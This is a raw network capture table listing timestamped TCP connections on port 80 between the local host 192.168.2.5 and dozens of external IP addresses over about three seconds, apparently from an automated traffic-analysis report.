Mar 22, 2023 05:43:40.158632040 CET	80	49886	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:40.158730984 CET	49886	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:40.158730984 CET	49886	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:40.175326109 CET	80	49887	172.67.165.62	192.168.2.5
Mar 22, 2023 05:43:40.175453901 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.178848028 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.200308084 CET	80	49887	172.67.165.62	192.168.2.5
Mar 22, 2023 05:43:40.221813917 CET	80	49882	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.221873999 CET	80	49882	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.221932888 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.221932888 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.249988079 CET	80	49887	172.67.165.62	192.168.2.5
Mar 22, 2023 05:43:40.250063896 CET	80	49887	172.67.165.62	192.168.2.5
Mar 22, 2023 05:43:40.250102043 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.250113964 CET	80	49887	172.67.165.62	192.168.2.5
Mar 22, 2023 05:43:40.250160933 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.250193119 CET	49887	80	192.168.2.5	172.67.165.62
Mar 22, 2023 05:43:40.316719055 CET	49882	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.394208908 CET	49876	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:40.455765963 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:40.459333897 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.465348005 CET	80	49882	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.482234955 CET	49889	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:40.545252085 CET	80	49889	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:40.545367956 CET	49889	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:40.545706034 CET	49889	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:40.595793962 CET	80	49881	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:40.608638048 CET	80	49888	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.608716965 CET	80	49889	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:40.608743906 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.609505892 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.617805958 CET	80	49889	195.78.66.50	192.168.2.5
Mar 22, 2023 05:43:40.617985010 CET	49889	80	192.168.2.5	195.78.66.50
Mar 22, 2023 05:43:40.632958889 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.634917974 CET	80	49881	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:40.635023117 CET	49881	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:40.656949043 CET	80	49890	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:40.657069921 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.665093899 CET	80	49876	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:40.665107012 CET	49839	80	192.168.2.5	64.125.133.18
Mar 22, 2023 05:43:40.692245960 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.693464994 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:40.693903923 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.716146946 CET	80	49890	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:40.716334105 CET	80	49890	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:40.716994047 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.735851049 CET	80	49892	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:40.735958099 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.737618923 CET	49893	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:40.738262892 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.751605034 CET	49894	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:40.751857042 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.758164883 CET	80	49888	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.758225918 CET	80	49888	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.758285999 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.758383989 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.759068012 CET	49888	80	192.168.2.5	54.161.222.85
Mar 22, 2023 05:43:40.775983095 CET	80	49890	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:40.776110888 CET	49890	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:40.780210972 CET	80	49892	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:40.780801058 CET	80	49892	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:40.780873060 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.840713024 CET	80	49893	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:40.842824936 CET	49893	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:40.855351925 CET	80	49894	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:40.856695890 CET	49894	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:40.856695890 CET	49894	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:40.906028032 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.906044006 CET	49893	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:40.906769991 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:40.907458067 CET	80	49888	54.161.222.85	192.168.2.5
Mar 22, 2023 05:43:40.908070087 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:40.940515995 CET	80	49895	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:40.940635920 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:40.942589998 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:40.948678017 CET	80	49892	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:40.949389935 CET	49892	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:40.960314035 CET	80	49894	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:40.960375071 CET	80	49894	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:40.960606098 CET	49894	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:40.976243019 CET	80	49895	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:40.977221012 CET	80	49895	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:40.977421045 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:40.996094942 CET	80	49891	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:40.996202946 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:41.009097099 CET	80	49893	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:41.011296034 CET	80	49893	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:41.012080908 CET	49893	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:41.046757936 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:41.120793104 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:41.155335903 CET	80	49895	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:41.155533075 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:41.156615019 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.161967039 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.191385031 CET	80	49897	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:41.191510916 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.194282055 CET	80	49898	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:41.194454908 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.198724031 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.202765942 CET	80	49896	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:41.202861071 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:41.233603954 CET	80	49898	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:41.233954906 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.260509014 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.261123896 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:41.270015001 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.295531988 CET	80	49897	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:41.295949936 CET	80	49897	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:41.296034098 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.303679943 CET	80	49898	213.186.33.40	192.168.2.5
Mar 22, 2023 05:43:41.305179119 CET	49898	80	192.168.2.5	213.186.33.40
Mar 22, 2023 05:43:41.328449965 CET	49900	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:41.328486919 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.329433918 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.349189997 CET	80	49891	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:41.350058079 CET	80	49891	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:41.350256920 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:41.365295887 CET	80	49897	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:41.367225885 CET	49897	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:41.439960003 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:41.441276073 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.482930899 CET	80	49901	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:41.485563040 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.485878944 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.488692045 CET	80	49899	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:41.489896059 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.490181923 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.519329071 CET	49902	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:41.527255058 CET	80	49901	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:41.537643909 CET	80	49901	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:41.540695906 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.556482077 CET	80	49896	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:41.556567907 CET	80	49902	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:41.556690931 CET	49902	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:41.557110071 CET	80	49896	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:41.557676077 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:41.567020893 CET	49902	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:41.589400053 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.590373039 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:41.604077101 CET	80	49902	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:41.604891062 CET	80	49902	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:41.605074883 CET	49902	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:41.641835928 CET	80	49901	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:41.641928911 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:41.653059959 CET	80	49899	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:41.653134108 CET	80	49899	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:41.653187037 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.653244972 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.682502985 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:41.682852030 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:41.715686083 CET	49899	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.743577003 CET	80	49891	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:41.744476080 CET	49891	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:41.774545908 CET	49867	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:41.843379021 CET	49903	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:41.874952078 CET	80	49899	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:41.887386084 CET	80	49896	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:41.887495041 CET	49896	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:41.996728897 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.002561092 CET	80	49903	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:42.002716064 CET	49903	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:42.002974987 CET	49903	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:42.019826889 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.020014048 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.028255939 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:42.028733969 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:42.043910027 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.065418959 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.116679907 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.134141922 CET	49850	80	192.168.2.5	198.100.146.220
Mar 22, 2023 05:43:42.156735897 CET	80	49895	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:42.158462048 CET	49895	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:42.162086010 CET	80	49903	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:42.162146091 CET	80	49903	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:42.162246943 CET	49903	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:42.162872076 CET	49903	80	192.168.2.5	18.119.154.66
Mar 22, 2023 05:43:42.238204002 CET	80	49905	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:42.238389015 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.241996050 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.244537115 CET	49907	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:42.252883911 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.266500950 CET	80	49906	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:42.266603947 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.272329092 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.296915054 CET	80	49906	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:42.296957016 CET	80	49906	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:42.297075033 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.313875914 CET	49908	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:42.314583063 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.321264029 CET	80	49903	18.119.154.66	192.168.2.5
Mar 22, 2023 05:43:42.339101076 CET	80	49906	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:42.339206934 CET	49906	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:42.342221022 CET	80	49908	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:42.343075991 CET	49908	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:42.374233007 CET	80	49905	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:42.375228882 CET	80	49905	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:42.377393961 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.423948050 CET	49908	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:42.425437927 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.452241898 CET	80	49908	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:42.453409910 CET	80	49908	217.19.237.54	192.168.2.5
Mar 22, 2023 05:43:42.455480099 CET	49908	80	192.168.2.5	217.19.237.54
Mar 22, 2023 05:43:42.524782896 CET	49874	80	192.168.2.5	185.15.129.58
Mar 22, 2023 05:43:42.547272921 CET	80	49905	96.127.180.42	192.168.2.5
Mar 22, 2023 05:43:42.547442913 CET	49905	80	192.168.2.5	96.127.180.42
Mar 22, 2023 05:43:42.625777006 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:42.625915051 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.628276110 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628298998 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628417969 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.628418922 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.628457069 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628496885 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628523111 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628540039 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628560066 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628561020 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.628572941 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628587008 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628601074 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628613949 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628629923 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.628637075 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.628737926 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.628829002 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.642816067 CET	80	49901	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:42.642925024 CET	49901	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:42.649696112 CET	80	49910	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:42.649882078 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.653656006 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.677191019 CET	80	49910	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:42.680135965 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.708142042 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.732316971 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.734101057 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.741269112 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741290092 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741319895 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741555929 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.741555929 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.741647959 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741668940 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741699934 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.741728067 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.741756916 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.742533922 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.742564917 CET	49912	80	192.168.2.5	62.75.216.137
Mar 22, 2023 05:43:42.742572069 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.742595911 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.742635965 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.742667913 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.743108988 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743134975 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743160009 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743290901 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.743359089 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.743872881 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743899107 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743921995 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.743958950 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.743994951 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.744714975 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.744743109 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.744765043 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.744896889 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.744936943 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.745366096 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.745393991 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.745414019 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.745512962 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.745541096 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.746247053 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.746272087 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.746391058 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.746417046 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.754102945 CET	80	49909	108.167.164.216	192.168.2.5
Mar 22, 2023 05:43:42.754188061 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:42.754506111 CET	49909	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:42.766875029 CET	80	49912	62.75.216.137	192.168.2.5
Mar 22, 2023 05:43:42.788397074 CET	80	49911	208.97.178.138	192.168.2.5
Mar 22, 2023 05:43:42.788500071 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.788808107 CET	49911	80	192.168.2.5	208.97.178.138
Mar 22, 2023 05:43:42.831487894 CET	80	49910	13.248.216.40	192.168.2.5
Mar 22, 2023 05:43:42.832855940 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.855401993 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.855448961 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.855487108 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.855731010 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.855784893 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.855829954 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.855900049 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.856122017 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.856174946 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.856185913 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.856220961 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.856226921 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.856282949 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.856978893 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857026100 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857064962 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857249022 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.857249022 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.857675076 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857718945 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857759953 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.857878923 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.858380079 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.858393908 CET	49910	80	192.168.2.5	13.248.216.40
Mar 22, 2023 05:43:42.858426094 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.858469009 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.858532906 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.858597994 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.859204054 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.859251022 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.859291077 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.859348059 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.859375954 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.859914064 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.859956980 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.859999895 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.860059977 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.860100031 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.860917091 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.860964060 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.861006021 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.861118078 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.861145020 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.861696959 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.861737967 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.861779928 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.861825943 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.861857891 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.862185001 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.862229109 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.862263918 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.862272978 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.862293005 CET	49904	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:42.862898111 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.862946033 CET	80	49904	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:42.862978935 CET	49904	80	192.168.2.5	172.67.201.26
